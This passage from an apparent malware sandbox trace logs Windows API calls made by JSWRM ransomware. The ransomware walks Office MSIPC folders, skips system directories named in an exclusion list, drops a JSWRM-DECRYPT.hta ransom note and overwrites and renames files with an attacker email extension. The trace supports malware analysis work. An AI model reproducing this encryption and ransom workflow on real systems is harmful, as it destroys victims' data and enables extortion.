cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.326] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0136.326] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="en-us", cAlternateFileName="")) returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2=".") returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="..") returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="...") returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="windows") returned -1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="recovery") returned -1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="perflogs") returned -1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="documents and settings") returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="$RECYCLE.BIN") returned 1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="system volume information") returned -1 [0136.326] lstrcmpiW (lpString1="en-us", lpString2="msocache") returned -1 [0136.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0136.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.329] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.329] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.330] CloseHandle (hObject=0x238) returned 1 [0136.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0136.330] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47ea9f3b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232240 [0136.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.331] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47ea9f3b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.331] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ea9f3b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47ea9f3b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47ea9f3b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.331] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a6407d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.331] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.332] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.332] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.332] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.333] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.333] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.334] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.336] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.337] CloseHandle (hObject=0x314) returned 1 [0136.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\en-us\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\en-us\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.338] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a6407d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.338] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0136.338] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="es", cAlternateFileName="")) returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2="...") returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2="windows") returned -1 [0136.338] lstrcmpiW (lpString1="es", lpString2="recovery") returned -1 [0136.338] lstrcmpiW (lpString1="es", lpString2="perflogs") returned -1 [0136.338] lstrcmpiW (lpString1="es", lpString2="documents and settings") returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2="$RECYCLE.BIN") returned 1 [0136.338] lstrcmpiW (lpString1="es", lpString2="system volume information") returned -1 [0136.338] lstrcmpiW (lpString1="es", lpString2="msocache") returned -1 [0136.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\jswrm-decrypt.hta")) returned 0xffffffff [0136.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.340] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.340] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.341] CloseHandle (hObject=0x238) returned 1 [0136.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\jswrm-decrypt.hta")) returned 0x20 [0136.341] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47ed0126, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0136.341] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.341] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47ed0126, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.341] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.341] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.341] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ed0126, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47ed0126, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47ed0126, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.341] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.342] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.342] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.343] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23192) returned 1 [0136.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.343] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5a90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5a90, lpOverlapped=0x0) returned 1 [0136.346] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.346] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5a90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5a90, lpOverlapped=0x0) returned 1 [0136.346] CloseHandle (hObject=0x314) returned 1 [0136.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\es\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\es\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.347] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.347] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0136.348] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="et", cAlternateFileName="")) returned 1 [0136.348] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0136.348] lstrcmpiW (lpString1="et", lpString2="..") returned 1 